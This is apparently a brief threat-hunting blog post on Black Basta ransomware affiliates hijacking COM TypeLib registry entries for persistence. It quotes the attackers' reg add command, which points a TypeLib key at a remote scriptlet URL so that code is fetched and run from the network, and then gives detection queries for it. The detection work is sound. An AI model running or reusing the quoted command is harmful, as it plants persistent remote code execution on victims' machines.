111. Black Basta Affiliates Use TypeLib Hijacking Technique
Hello everyone! Let's talk about not so common persistence techniques. According to ReliaQuest report, Black Basta ransomware affiliates started to use a novel persistence method that involved hijacking the Component Object Model Type Library.
In TypeLib hijacking, attackers modify registry entries to redirect legitimate COM objects to malicious scripts or files.
The threat actors executed the following command:
reg add ""HKEY_CURRENT_USER\Software\Classes\TypeLib{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64"" /t REG_SZ /d "script:hxxps://drive.google[dot]com/uc?export=download^&id=1l5cMkpY9HIERae03tqqvEzCVASQKen63" /f
For example, we can search for abusing reg.exe:
event_type: "processcreatewin"
AND
proc_file_name: "reg.exe"
AND
cmdline: ("TypeLib" AND "script")
We can also hunt for registry modification events:
event_type: "registryvaluesetwin"
AND
reg_key_path: "TypeLib"
AND
reg_value_data: "script"
See you tomorrow!
Comments
Post a Comment